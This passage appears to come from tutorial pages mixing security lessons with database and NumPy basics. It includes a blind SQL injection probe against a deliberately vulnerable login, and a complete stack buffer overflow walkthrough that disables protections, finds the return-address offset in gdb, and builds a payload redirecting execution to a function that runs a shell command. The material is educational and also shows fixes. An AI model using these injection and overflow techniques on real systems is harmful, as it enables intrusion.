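    probe = "' OR (SELECT COUNT(*) FROM %s) > 0 --" % table
    outcome = "Login successful" if vulnerable_login(conn, probe, "test") else "Login failed"
    print(table, "->", outcome)
```

The only thing that changes between the two attempts is the table name, so the login result alone reveals whether that table exists.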
Insecure Design

A threat actor may supply any ID to retrieve another user's information, because the logic retrieves users by incremental IDs and does not check who is making the request.

from sqlite3 import connect # Import the connect function from sqlite3 to interact with SQLite databases
from contextlib import closing # Import closing from contextlib to ensure the connection is properly closed
temp_id = input("Enter id: ") # Prompt the user to enter an id
with closing(connect("database.db",isolation_level=None)) as conn: # Use a context manager to automatically close the database connection when done
    conn.execute("DROP TABLE IF EXISTS users") # Delete the table named 'users' if it exists
    conn.execute("CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)") # Create a table named 'users' if it doesn't already exist, column 'id': stores a numeric identifier for each user, column 'user': stores the username as text, column 'hash': stores the password hash as text
    conn.execute("INSERT into users(id ,user, hash) values(?,?, ?)", (1,"john", "e66860546f18")) # Insert a new row into the 'users' table
    conn.execute("INSERT into users(id, user, hash) values(?,?, ?)", (2,"jane", "cdbbcd86b35e")) # Insert a new row into the 'users' table
    print(conn.execute("SELECT * FROM users WHERE id=?", (temp_id,)).fetchall()) # Query the users table for a specific id using a parameterized query (safe against injection, but any id is accepted)
```
from sqlite3 import connect
from contextlib import closing
temp_id = input("Enter id: ")
with closing(connect("database.db",isolation_level=None)) as conn:
    conn.execute("DROP TABLE IF EXISTS users")
    conn.execute("CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)")
    conn.execute("INSERT into users(id ,user, hash) values(?,?, ?)", (1,"john", "e66860546f18"))
    conn.execute("INSERT into users(id, user, hash) values(?,?, ?)", (2,"jane", "cdbbcd86b35e"))
    print(conn.execute("SELECT * FROM users WHERE id=?", (temp_id,)).fetchall())
```
Statement will be
```
SELECT * FROM users WHERE id=1
```
Output
```
[(1, 'john', 'e66860546f18')]
```
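One way to address this design flaw is to compare the requested id with the identity of the caller before running the query. The sketch below is only an illustration: the function name get_profile and the session_user_id parameter (the id of the logged-in user) are hypothetical, and how a real application obtains that id depends on its session handling.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id integer, user text, hash text)")
conn.execute("INSERT INTO users VALUES (?, ?, ?)", (1, "john", "e66860546f18"))
conn.execute("INSERT INTO users VALUES (?, ?, ?)", (2, "jane", "cdbbcd86b35e"))

def get_profile(conn, requested_id, session_user_id):
    # Authorization check: a user may only read their own record
    if int(requested_id) != session_user_id:
        raise PermissionError("not allowed to read another user's record")
    # Return only the columns the caller needs (the hash is left out)
    return conn.execute(
        "SELECT id, user FROM users WHERE id=?", (int(requested_id),)
    ).fetchone()

print(get_profile(conn, "1", session_user_id=1))
try:
    get_profile(conn, "2", session_user_id=1)
except PermissionError as err:
    print("Denied:", err)
```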
User Input (SQL/Blind SQL Injection)

If you want to pass dynamic values to the SQL statement, use ? as a placeholder and pass the values in a tuple, e.g., (value,). The ? tells the db engine to bind the passed value as data instead of parsing it as part of the SQL statement. E.g., if someone enters the ' symbol, which could otherwise be used to close a string literal, it is treated as an ordinary character inside the value and cannot change the structure of the query.

Python

from sqlite3 import connect # Import the connect function from sqlite3 to interact with SQLite databases
from contextlib import closing # Import closing from contextlib to ensure the connection is properly closed
temp_user = input("Enter username: ") # Prompt the user to enter a username
temp_hash = input("Enter password: ") # Prompt the user to enter a password (usually a function would hash the password; that step is omitted here)
with closing(connect("database.db",isolation_level=None)) as conn: # Use a context manager to automatically close the database connection when done
    conn.execute("DROP TABLE IF EXISTS users") # Delete the table named 'users' if it exists
    conn.execute("CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)") # Create a table named 'users' if it doesn't already exist, column 'id': stores a numeric identifier for each user, column 'user': stores the username as text, column 'hash': stores the password hash as text
    conn.execute("INSERT into users(id ,user, hash) values(?,?, ?)", (1,"john", "e66860546f18")) # Insert a new row into the 'users' table
    conn.execute("INSERT into users(id, user, hash) values(?,?, ?)", (2,"jane", "cdbbcd86b35e")) # Insert a new row into the 'users' table
    print(conn.execute("SELECT * FROM users WHERE user=? AND hash=?", (temp_user,temp_hash,)).fetchall()) # Safely query the users table for a specific username and password using a parameterized query
```
from sqlite3 import connect
from contextlib import closing
temp_user = input("Enter username: ")
temp_hash = input("Enter password: ")
with closing(connect("database.db",isolation_level=None)) as conn:
    conn.execute("DROP TABLE IF EXISTS users")
    conn.execute("CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)")
    conn.execute("INSERT into users(id ,user, hash) values(?,?, ?)", (1,"john", "e66860546f18"))
    conn.execute("INSERT into users(id, user, hash) values(?,?, ?)", (2,"jane", "cdbbcd86b35e"))
    print(conn.execute("SELECT * FROM users WHERE user=? AND hash=?", (temp_user,temp_hash,)).fetchall())
```
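To see the effect of the placeholders, the earlier injection string can be passed to the parameterized query. This is a minimal sketch under assumptions: it uses an in-memory database, and the helper name safe_login is hypothetical.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id integer, user text, hash text)")
conn.execute("INSERT INTO users VALUES (?, ?, ?)", (1, "john", "e66860546f18"))

def safe_login(conn, user, pw_hash):
    # Values are bound to the ? placeholders and never parsed as SQL
    row = conn.execute(
        "SELECT * FROM users WHERE user=? AND hash=?", (user, pw_hash)
    ).fetchone()
    return row is not None

injection = "' OR (SELECT COUNT(*) FROM users) > 0 --"
print(safe_login(conn, injection, "test"))          # False
print(safe_login(conn, "john", "e66860546f18"))     # True
```

The injection string is compared literally against the user column, so it matches no row and the login fails.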
April 5, 2026
Relational Databases
Relational databases

Relational databases are a type of database that store data in a structured, table-based format. Each table consists of rows and columns, where each row represents a unique record and each column represents a specific attribute or field of that record. This organization allows data to be easily categorized, searched, and managed. The table-based structure ensures that information is stored consistently, making it simpler to maintain accuracy and integrity across the database.

The relational aspect of these databases comes from their ability to link data across multiple tables using keys. A primary key uniquely identifies each record within a table, while a foreign key allows one table to reference data in another. This system of relationships enables complex queries and data retrieval, such as combining information from different tables or enforcing rules that maintain data consistency. By defining these relationships, relational databases can model real-world scenarios more effectively.

Relational databases are managed using Relational Database Management Systems (RDBMS) such as MySQL, PostgreSQL, Oracle, and Microsoft SQL Server. These systems provide tools to insert, update, delete, and query data using Structured Query Language (SQL). They also offer features for security, backup, scalability, and transaction management, making them suitable for a wide range of applications, from small business systems to large-scale enterprise solutions. Their structured nature and robust management capabilities make relational databases one of the most widely used forms of data storage today.

Example

A table named users with three fixed columns: id (Integer, 4 bytes), user (Text, max 30 bytes), and hash (Text, 12 bytes)
```
+----+------+---------------+
| id | user |      hash     |
+----+------+---------------+
| 1  | john |  e66860546f18 |
+----+------+---------------+
| 2  | jane |  cdbbcd86b35e |
+----+------+---------------+
```
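The primary key and foreign key relationship described above can be sketched with Python's built-in sqlite3 module. This is an illustration under assumptions: the logins table, its columns, and the IP addresses are hypothetical and are not part of the original example.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("PRAGMA foreign_keys = ON")  # SQLite enforces foreign keys only when enabled

# 'id' is the primary key: it uniquely identifies each user
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, user TEXT, hash TEXT)")
# 'user_id' is a foreign key: it must reference an existing users.id
conn.execute(
    "CREATE TABLE logins ("
    "id INTEGER PRIMARY KEY, "
    "user_id INTEGER REFERENCES users(id), "
    "ip TEXT)"
)

conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                 [(1, "john", "e66860546f18"), (2, "jane", "cdbbcd86b35e")])
conn.executemany("INSERT INTO logins (user_id, ip) VALUES (?, ?)",
                 [(1, "10.0.0.5"), (2, "10.0.0.9"), (1, "10.0.0.7")])

# Combine both tables through the key relationship
rows = conn.execute(
    "SELECT users.user, logins.ip FROM logins "
    "JOIN users ON users.id = logins.user_id ORDER BY logins.id"
).fetchall()
print(rows)

# A login row for a user that does not exist violates the foreign key
try:
    conn.execute("INSERT INTO logins (user_id, ip) VALUES (?, ?)", (99, "10.0.0.1"))
    fk_rejected = False
except sqlite3.IntegrityError:
    fk_rejected = True
print("Orphan row rejected:", fk_rejected)
```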
Relational databases (Pros and Cons)
- Pros of Relational Databases
  - Structured and Organized
    
    Data is stored in tables with rows and columns, making it easy to understand and manage.
  - Data Integrity
    
    Primary and foreign keys enforce unique records and consistent relationships between tables.
  - Flexible Queries
    
    SQL allows complex queries, joins, aggregations, and data retrieval across multiple tables.
  - Consistency
    
    ACID (Atomicity, Consistency, Isolation, Durability) properties ensure reliable transactions.
  - Scalability for Many Applications
    
    Suitable for small to large systems, from business applications to enterprise-level solutions.
  - Security and Access Control
    
    RDBMS systems provide user permissions, authentication, and auditing features.
  - Mature Tools and Support
    
    Popular systems like MySQL, PostgreSQL, Oracle, and SQL Server have extensive documentation and community support.
- Cons of Relational Databases
  - Complexity
    
    Designing a relational schema with proper relationships can be challenging.
  - Performance Issues at Large Scale
    
    Large datasets with many joins can slow down queries, especially in highly transactional environments.
  - Rigid Schema
    
    Changes to table structures (like adding new columns) can be cumbersome and require careful planning.
  - Less Suitable for Unstructured Data
    
    Storing images, videos, logs, or JSON-like data can be inefficient.
  - Scalability Limitations
    
    Horizontal scaling (sharding) is more complex compared to some NoSQL databases.
  - Cost
    
    Enterprise RDBMS licenses (like Oracle or SQL Server) can be expensive.
April 5, 2026

Stack‑based Buffer Overflow

A stack‑based buffer overflow happens when a program writes more data into a stack‑allocated buffer than it was designed to hold. Because the stack stores important control data (like return addresses), overflowing a buffer can overwrite that data and change how the program executes.

The following code contains a function named hidden that is never called during normal execution. However, a threat actor could exploit a stack‑based buffer overflow to redirect execution flow and invoke this function that lists the files in the current directory.

#include <stdio.h> // Provides printf(), gets()
#include <stdlib.h> // Provides system(), exit()
#include <string.h> // String functions (not directly used here)

void hidden() {
    printf("Hidden Function\n"); // Print a message to stdout
    system("ls -la"); // Execute a shell command
    exit(0); // Terminate the program immediately
}

void vulnerable() {
    char buffer[20]; // Allocate 20 bytes on the stack
    printf("Enter text: "); // Prompt the user
    gets(buffer); // No bounds checking: input longer than the buffer will overwrite adjacent stack memory
    printf("You entered: %s\n", buffer); // Echo user input back
}

int main() {
    vulnerable(); // Execute vulnerable code
    return 0; // Normal program termination
}

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void hidden() {
    printf("Hidden Function\n");
    system("ls -la");
    exit(0);
}

void vulnerable() {
    char buffer[20];
    printf("Enter text: ");
    gets(buffer); 
    printf("You entered: %s\n", buffer);
}

int main() {
    vulnerable();
    return 0;
}

Compile the program with gcc

gcc # an open-source set of compilers and development tools for various programming languages
-m32 # Compile as 32-bit (simpler stack layout, x86 calling convention)
-O0 # Disable optimizations (keeps variables on the stack)
-ggdb # Include GDB debugging symbols
-static # Statically link libraries (fixed addresses, larger binary)
-U_FORTIFY_SOURCE # Disable _FORTIFY_SOURCE safety checks
-z execstack # Mark stack as executable (disable NX/DEP)
-fno-stack-protector # Disable stack canaries
-no-pie # Disable PIE (fixed code addresses, weaker ASLR)
-mpreferred-stack-boundary=2 # Set stack alignment to 4 bytes (2^2)
app.c -o app # Compile app.c into output binary “app”

gcc -m32 -O0 -ggdb -static -U_FORTIFY_SOURCE -z execstack -fno-stack-protector -no-pie -mpreferred-stack-boundary=2 app.c -o app

Start a shell with ASLR disabled using setarch

setarch # Run a program with modified architecture settings
`uname -m` # Use the current machine architecture (e.g., x86_64)
-R # Disable ASLR (Address Space Layout Randomization)
$SHELL # Start a new shell with these settings applied

setarch `uname -m` -R $SHELL

Change the app mode

chmod # a Linux/Unix command used to change the permissions of a file or directory
+x # Make it executable
app # Name of the app

chmod +x app

Then, run the program with gdb

root@u20:~# gdb app
GNU gdb (Ubuntu 9.2-0ubuntu1~20.04.2) 9.2
Copyright (C) 2020 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from app...

Instead of manually entering input, we use a Python one-liner to generate the payload. The payload is 34 bytes long: the first 20 bytes fill the buffer, and the remaining 14 bytes overflow into the adjacent stack memory, which is enough to corrupt the saved return address and cause a segmentation fault.

(gdb) run < <(python3 -c "import struct; import sys; sys.stdout.buffer.write(b'A'*34)")
Starting program: /root/app < <(python3 -c "import struct; import sys; sys.stdout.buffer.write(b'A'*34)")
Enter text: You entered: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x08004141 in ?? ()

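Print the CPU registers, focusing on the EIP register, which points to the next instruction to execute. When a function is called, its return address is pushed onto the stack; when the function returns, that address is loaded into EIP. In this case, the value 0x08004141 indicates that user-controlled input has partially overwritten the return address: the two low bytes (0x41 0x41) are the last two 'A' characters of the payload, and the 0x00 byte is the string terminator that gets() appends. Because x86 is little-endian, those two bytes are the first two bytes of the saved return address, which confirms that the return address is reached after 32 bytes of padding.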

(gdb) info registers
eax            0x30                48
ecx            0x7fffffd0          2147483600
edx            0x80b503c           134959164
ebx            0x41414141          1094795585
esp            0xffffd660          0xffffd660
ebp            0x41414141          0x41414141
esi            0x80e7000           135163904
edi            0x80e7000           135163904
eip            0x8004141           0x8004141
eflags         0x10286             [ PF SF IF RF ]
cs             0x23                35
ss             0x2b                43
ds             0x2b                43
es             0x2b                43
fs             0x0                 0
gs             0x63                99
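
The EIP value can be reproduced offline to check the 32-byte offset. The following is a sketch under assumptions: the original return address 0x08049e2b is hypothetical (only its top byte, 0x08, matters here and is taken from the register dump), and the variable names are illustrative.

```python
import struct

OFFSET = 32                                   # padding before the saved return address
payload = b"A" * 34 + b"\x00"                 # 34 input bytes plus the NUL that gets() appends
original_ret = struct.pack("<I", 0x08049E2B)  # hypothetical saved return address (little-endian)

# Bytes of the payload that land on the saved return address
spill = payload[OFFSET:]                      # b"AA\x00"
# The remaining byte(s) of the return address keep their original value
corrupted_ret = spill + original_ret[len(spill):]

eip = struct.unpack("<I", corrupted_ret)[0]
print(hex(eip))  # 0x8004141
```

The result matches the value gdb reports, which supports the offset of 32 bytes.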

Let’s find the hidden function address

(gdb) disas hidden
Dump of assembler code for function hidden:
   0x08049d95 <+0>:     endbr32 
   0x08049d99 <+4>:     push   %ebp
   0x08049d9a <+5>:     mov    %esp,%ebp
   0x08049d9c <+7>:     push   %ebx
   0x08049d9d <+8>:     sub    $0x4,%esp
   0x08049da0 <+11>:    call   0x8049c70 <__x86.get_pc_thunk.bx>
   0x08049da5 <+16>:    add    $0x9d25b,%ebx
   0x08049dab <+22>:    sub    $0xc,%esp
   0x08049dae <+25>:    lea    -0x31ff8(%ebx),%eax
   0x08049db4 <+31>:    push   %eax
   0x08049db5 <+32>:    call   0x8058b40 <puts>
   0x08049dba <+37>:    add    $0x10,%esp
   0x08049dbd <+40>:    sub    $0xc,%esp
   0x08049dc0 <+43>:    lea    -0x31fe8(%ebx),%eax
   0x08049dc6 <+49>:    push   %eax
   0x08049dc7 <+50>:    call   0x8051560 <system>
   0x08049dcc <+55>:    add    $0x10,%esp
   0x08049dcf <+58>:    sub    $0xc,%esp
   0x08049dd2 <+61>:    push   $0x0
   0x08049dd4 <+63>:    call   0x8050730 <exit>
End of assembler dump.

Use that address (0x08049d95) in the exploit payload after the 32 bytes of padding. When vulnerable() returns, execution jumps to the hidden function, which lists the files in the current directory.

(gdb) run < <(python3 -c "import struct; import sys; sys.stdout.buffer.write(b'A'*32 + struct.pack('I', 0x08049d95))")
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/app < <(python3 -c "import struct; import sys; sys.stdout.buffer.write(b'A'*32 + struct.pack('I', 0x08049d95))")
Enter text: You entered: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Hidden Function
[Detaching after vfork from child process 449]
total 784
drwx------  5 root root   4096 Feb 10 20:16 .
drwxr-xr-x 24 root root   4096 Feb 10 18:59 ..
-rw-r--r--  1 root root   1024 Feb 10 07:02 .app.swp
-rwxr-xr-x  1 root root 721556 Feb 10 20:16 app
-rw-r--r--  1 root root    326 Feb 10 20:16 app.c
drwxr-xr-x  9 root root   4096 Oct 19 14:51 vsftpd-2.3.4
[Inferior 1 (process 446) exited normally]
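
The payload used in the run above can also be built with a small helper, which makes the byte layout easier to inspect. This is a sketch, not part of the original session: the function name build_payload is hypothetical, and it uses the explicit little-endian format '<I' where the one-liner relies on the native byte order of the machine.

```python
import struct

def build_payload(offset, target_address):
    # Padding up to the saved return address, then the new return address
    return b"A" * offset + struct.pack("<I", target_address)

payload = build_payload(32, 0x08049D95)
print(len(payload))        # 36
print(payload[-4:].hex())  # 959d0408

# gets() stops reading at a newline, so the payload must not contain 0x0a
print(b"\n" in payload)    # False
```

The address bytes appear reversed (95 9d 04 08) because x86 stores multi-byte values in little-endian order.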

April 5, 2026

NumPy
NumPy

NumPy stands for Numerical Python. It is a Python library, created in 2005, for working with arrays.

Install (If pip does not work, try pip3)

pip # Python’s package manager used to install libraries
install # Tells pip to download and install a package
numpy # A Python library for numerical and scientific computing
```
(Host) $ pip install numpy
```
import numpy as np # Imports the NumPy library and gives it the alias np
```
import numpy as np
```
Create an Array

An array is a data structure that stores more than one item of the same type. It is similar to a list in Python, but it is faster, more convenient for numerical work, and requires less memory. To create an array, call np.array() with the items surrounded by []. You can also pass the dtype parameter to np.array() to describe the data type

Example

import numpy as np # Imports the NumPy library and gives it the alias np
arr = np.array([1,2,3]) # Creates a NumPy array from the Python list
print(arr) # Prints the array
```
import numpy as np
arr = np.array([1,2,3])
print(arr)
```
Result
```
[1 2 3]
```
Data Types

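If you want to describe the data type, pass dtype a type code such as 'i' or 'f'. The letters below are NumPy's data type kinds, which is also what arr.dtype.kind reports. You can get the size of a type in bytes using itemsize, e.g., np.dtype('f').itemsize. Note that not every kind letter selects that kind when passed alone as a dtype string; for example, 'b' creates a signed 8-bit integer, so use '?' or bool for booleans.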
```
i integer
b boolean
u unsigned integer
f float
c complex float
m timedelta
M datetime
O object
S string
U unicode string
V void
```
Example

import numpy as np # Imports the NumPy library and gives it the alias np
arr = np.array([1,2,3], dtype='f') # Creates a NumPy array from the Python list and sets the data type of the elements to float32, so the numbers are stored as floating-point numbers
print(arr) # Prints the array
```
import numpy as np
arr = np.array([1,2,3], dtype='f')
print(arr)
```
Result
```
[1. 2. 3.]
```
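The type codes can be inspected directly through the dtype object. The short sketch below shows the kind letter and the size in bytes for a few codes; the sized codes 'i4' and 'f8' are added here for illustration and do not appear in the list above.

```python
import numpy as np

arr = np.array([1, 2, 3], dtype='f')
print(arr.dtype)           # float32
print(arr.dtype.kind)      # f
print(arr.dtype.itemsize)  # 4 (bytes per element)

# A kind letter can be followed by a size in bytes
print(np.dtype('i4').itemsize)  # 4
print(np.dtype('f8').itemsize)  # 8

# 'b' on its own is a signed 8-bit integer; '?' is the boolean type
print(np.dtype('b'))       # int8
print(np.dtype('?'))       # bool
```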
Create Multi-Dimensional

To create a multi-dimensional array, use the .array() with the items surrounded by [] within [], you can also pass the dtype parameter to the .array() method for describing the data type

Example

import numpy as np # Imports the NumPy library and gives it the alias np
arr = np.array([['item 1','item 2'],['item 1','item 2']]) # Creates a 2-dimensional NumPy array (a 2×2 "matrix") from a nested list
print(arr) # Prints the array
```
import numpy as np
arr = np.array([['item 1','item 2'],['item 1','item 2']]) 
print(arr)
```
Result
```
[['item 1' 'item 2']
 ['item 1' 'item 2']]
```
Example

import numpy as np # Imports the NumPy library and gives it the alias np
arr = np.array([[1,2],[1,2]], dtype='f') # Creates a 2-dimensional NumPy array (a 2×2 "matrix") from a nested list and sets the data type of the elements to float32, so the numbers are stored as floating-point numbers
print(arr) # Prints the array
```
import numpy as np
arr = np.array([[1,2],[1,2]], dtype='f') 
print(arr)
```
Result
```
[[1. 2.]
 [1. 2.]]
```
Create Empty Arrays

To create an array without supplying the items yourself, you can use either the .empty() or .zeros() function. The .empty() function returns an array without initializing its entries, so it contains whatever values happen to be in memory, whereas the .zeros() function returns an array filled with zeros.

Example

import numpy as np # Imports the NumPy library and gives it the alias np
arr = np.zeros(shape=(10),dtype='i') # Creates a 1-dimensional array of 10 items, all initialized to 0 and stored as integers
print(arr) # Prints the array
```
import numpy as np
arr = np.zeros(shape=(10),dtype='i')
print(arr)
```
Result
```
[0 0 0 0 0 0 0 0 0 0]
```
Example

import numpy as np # Imports the NumPy library and gives it the alias np
arr = np.empty(shape=(10),dtype='i') # Creates a 1-dimensional array of 10 items without initializing them, stored as integers
print(arr) # Prints the array
```
import numpy as np
arr = np.empty(shape=(10),dtype='i')
print(arr)
```
Result
```
[ 0 1072693248  0 1074135040  0 1075314688
  0 1076199424  0 1076953088]
```
Create an Array Filled With Ones

To create an array filled with 1s, use the .ones() function

Example

import numpy as np # Imports the NumPy library and gives it the alias np
arr = np.ones(shape=(10),dtype='i') # Creates a 1-dimensional array of 10 items, all initialized to 1 and stored as integers
print(arr) # Prints the array
```
import numpy as np
arr = np.ones(shape=(10),dtype='i')
print(arr)
```
Result
```
[1 1 1 1 1 1 1 1 1 1]
```
Accessing Elements

To access an element of an array, use the index. E.g., to access the first item in a 1d array, you can do [0]. To access 2nd element of the second array in a 2d array, you can do [1][1], and so on

Example

import numpy as np # Imports the NumPy library and gives it the alias np
arr = np.array([1,2], dtype='f') # Creates an array with values 1 and 2, and sets the data type of the elements to float32.
print(arr[0]) # Prints the first element of the array (indexing starts at 0).
```
import numpy as np 
arr = np.array([1,2], dtype='f') 
print(arr[0])
```
Result
```
1.0
```
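The 2d case mentioned above can be sketched as follows. The array values are chosen only for illustration; the comma form [row, column] is NumPy's own indexing syntax and gives the same result as chaining [row][column].

```python
import numpy as np

arr2d = np.array([[1, 2], [3, 4]])

print(arr2d[1][1])   # 4: second element of the second row (chained indexing)
print(arr2d[1, 1])   # 4: same element using a single [row, column] index
print(arr2d[0])      # [1 2]: indexing with one value returns the whole row
print(arr2d[-1, 0])  # 3: negative indices count from the end
```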
Slicing Arrays

To slice an array, use the smart indexing [], you can do something like this [start:end] or [start:end:step]

Example

import numpy as np # Imports the NumPy library and gives it the alias np
arr = np.array([1,2,3,4,5]) # Creates an array with values 1,2,3,4,5
print(arr[1:4]) # The syntax is arr[start:stop], which selects elements starting from index start up to but not including index stop, prints the selected items
```
import numpy as np
arr = np.array([1,2,3,4,5])
print(arr[1:4])
```
Result
```
[2 3 4]
```
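The [start:end:step] form mentioned above is not covered by the example, so here is a short sketch of it. It also shows that a slice is a view of the original array rather than a copy; the variable names are illustrative.

```python
import numpy as np

arr = np.array([1, 2, 3, 4, 5])

print(arr[0:5:2])  # [1 3 5]: every second item from index 0 up to (not including) 5
print(arr[::-1])   # [5 4 3 2 1]: a negative step walks the array backwards
print(arr[:2])     # [1 2]: an omitted start defaults to the beginning

# A slice is a view: writing to it changes the original array
view = arr[1:4]
view[0] = 20
print(arr)         # [ 1 20  3  4  5]
```

If an independent copy is needed, call .copy() on the slice.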
Get Array Size

To get the number of items in an array, use the .size attribute

Example

import numpy as np # Imports the NumPy library and gives it the alias np
arr = np.array([[1,2],[1,2]], dtype='f') # Creates a 2-dimensional NumPy array (a 2×2 "matrix") from a nested list, and sets the data type of the elements to float32
print(arr.size) # Prints the array size (the total number of items in the array)
```
import numpy as np 
arr = np.array([[1,2],[1,2]], dtype='f') 
print(arr.size)
```
Result
```
4
```
Get Array Shape

To get the shape of an array, use the .shape attribute

Example

import numpy as np # Imports the NumPy library and gives it the alias np
arr = np.array([[1,2],[1,2]], dtype='f') # Creates a 2-dimensional NumPy array (a 2×2 "matrix") from a nested list, and sets the data type of the elements to float32
print(arr.shape) # Prints the array shape (the number of items along each dimension)
```
import numpy as np 
arr = np.array([[1,2],[1,2]], dtype='f') 
print(arr.shape)
```
Result
```
(2, 2)
```
Reshape Arrays

You can reshape an array using the .reshape() method

Example

import numpy as np # Imports the NumPy library and gives it the alias np
arr = np.array([1,2,3,4,5,6]) # Creates an array with values 1,2,3,4,5,6
arr = arr.reshape(2,3) # Reshapes the array to 2×3 (2 rows and 3 columns)
print(arr) # Prints the array
```
import numpy as np
arr = np.array([1,2,3,4,5,6])
arr = arr.reshape(2,3)
print(arr)
```
Result
```
[[1 2 3]
 [4 5 6]]
```
Flatten Arrays

You can flatten (Convert from multi-dimensional to one-dimensional) an array using the .reshape() method with -1

Example

import numpy as np # Imports the NumPy library and gives it the alias np
arr = np.array([[1,2,3],[4,5,6]]) # Creates a 2d array
arr = arr.reshape(-1) # Reshapes the array to a 1d array
print(arr) # Prints the array
```
import numpy as np
arr = np.array([[1,2,3],[4,5,6]])
arr = arr.reshape(-1)
print(arr)
```
Result
```
[1 2 3 4 5 6]
```
Finding Elements

To find an element, use the np.argwhere() method

Example

import numpy as np # Imports the NumPy library and gives it the alias np
arr = np.array([[1,2,3],[11,22,33]]) # Creates a 2d array
print(np.argwhere(arr == 33)) # Prints the row and column location(s) where the value 33 appears in the array
```
import numpy as np
arr = np.array([[1,2,3],[11,22,33]])
print(np.argwhere(arr == 33))
```
Result
```
[[1 2]]
```
Removing Elements

To remove an element, use the np.delete() method

Example

import numpy as np # Imports the NumPy library and gives it the alias np
arr = np.array([1,2,3,4,5,6,7,8]) # Creates an array with values 1,2,3,4,5,6,7,8
index = np.argwhere(arr == 4) # Finds the index location(s) where the value 4 appears in the array
arr = np.delete(arr, index) # Removes the element(s) at the given index from arr, then stores the result back in arr
print(arr) # Prints the array
```
import numpy as np
arr = np.array([1,2,3,4,5,6,7,8])
index = np.argwhere(arr == 4)
arr = np.delete(arr, index)
print(arr)
```
Result
```
[1 2 3 5 6 7 8]
```
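```
# Alternative: arr = arr[arr != 4] keeps every item that is not 4 (boolean mask)
```
```
# Alternative: np.place(arr,(arr == 4),5) replaces every 4 with 5 in place instead of removing it
```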
Creating Images

The following represents a single pixel with RGB values of (0, 0, 0), which is black.

Example

import numpy as np # Imports the NumPy library and gives it the alias np
import matplotlib.pyplot as plt # Import Matplotlib for plotting and image display
pixel_rgb = np.array([[[0, 0, 0]]], dtype=np.uint8) # Create a 1×1 image with an RGB pixel value of (0, 0, 0) – This represents a single black pixel, dtype=np.uint8 ensures values are in the valid range for image data (0–255)
plt.imshow(pixel_rgb) # Display the RGB pixel as an image
plt.title("Example") # Add a title above the image
plt.axis('off') # Remove x and y axis ticks for a cleaner image display
plt.show() # Render the image on the screen
```
import numpy as np
import matplotlib.pyplot as plt
pixel_rgb = np.array([[[0, 0, 0]]], dtype=np.uint8)
plt.imshow(pixel_rgb)
plt.title("Example")
plt.axis('off')
plt.show()
```
Example

import numpy as np # Import NumPy for array creation and manipulation
from PIL import Image # Import Image module (not used directly here)
import matplotlib.pyplot as plt # Import matplotlib for image display (not used here)
img = np.zeros([1,1,3], dtype=np.uint8) # Create a 1×1 RGB image array initialized to zeros
img.fill(0) # Fill the array with 0 (black pixel)
print(img) # Print the pixel values of the image array
```
import numpy as np
from PIL import Image
import matplotlib.pyplot as plt
img = np.zeros([1,1,3],dtype=np.uint8)
img.fill(0)
print(img)
```
You can also list all pixels

import numpy as np # Import NumPy for array creation and manipulation
from PIL import Image # Import Image module (not used directly here)
import matplotlib.pyplot as plt # Import matplotlib for image display
img = np.zeros([1,1,3], dtype=np.uint8) # Create a 1×1 RGB image array initialized to zeros
img.fill(0) # Fill the array with 0 (black pixel)
height, width, _ = img.shape # Unpack the image height and width (the third value, the number of channels, is ignored)
for y in range(height): # Loop over each row (y-coordinate)
    for x in range(width): # Loop over each column (x-coordinate)
        print(img[y, x]) # Print the pixel value at position (y, x), this is typically an array like [R, G, B]
plt.imshow(img) # Display the image using matplotlib
plt.title("Example") # Add a title to the image
plt.axis('off') # Turn off axis ticks and labels
plt.show() # Render the image on the screen
```
import numpy as np
from PIL import Image
import matplotlib.pyplot as plt
img = np.zeros([1,1,3],dtype=np.uint8)
img.fill(0)
height, width, _ = img.shape
for y in range(height): 
    for x in range(width):
        print(img[y, x])
plt.imshow(img)
plt.title("Example")
plt.axis('off')
plt.show()
```
Converting Images Into Arrays

The following opens an image file using Pillow, converts the image into a NumPy array so its pixel values can be processed numerically, and then prints the resulting array.

from PIL import Image # Import Image class from Pillow to work with image files
import numpy as np # Import NumPy for numerical array operations
img = Image.open('example.png') # Open the image file and load it as a PIL Image object
img_array = np.array(img) # Convert the image into a NumPy array (pixel values)
print(img_array) # Print the array representing the image pixels
```
from PIL import Image
import numpy as np
img = Image.open('example.png')
img_array = np.array(img)
print(img_array)
```
Create Random Image

Creates and shows a tiny, randomly colored image

import numpy as np # Import NumPy for array creation and manipulation
import matplotlib.pyplot as plt # Import matplotlib for image display
pixel_rgb = np.random.randint(0,256, size=(10,10,3)) # Generate a 10×10 image with random RGB values, np.random.randint(0,256, size=(10,10,3)) creates integers from 0 to 255 for each RGB channel
plt.imshow(pixel_rgb) # Show the image from the pixel array
plt.title("Example") # Add a title to the image
plt.axis('off') # Hide the axes for a cleaner display
plt.show() # Render the image on screen
```
import numpy as np
import matplotlib.pyplot as plt
pixel_rgb = np.random.randint(0,256, size=(10,10,3))
plt.imshow(pixel_rgb)
plt.title("Example")
plt.axis('off')
plt.show()
```
Cybersecurity – Example 1 (Network Traffic Analysis)

You can use the np.mean() function to establish a traffic baseline; values far above the average are unusual spikes, which might indicate a DDoS attack

import numpy as np # Import the NumPy library and give it the alias 'np'
packets_per_second = np.array([1000, 50, 100, 120, 500, 115000]) # Create an array of packets-per-second samples
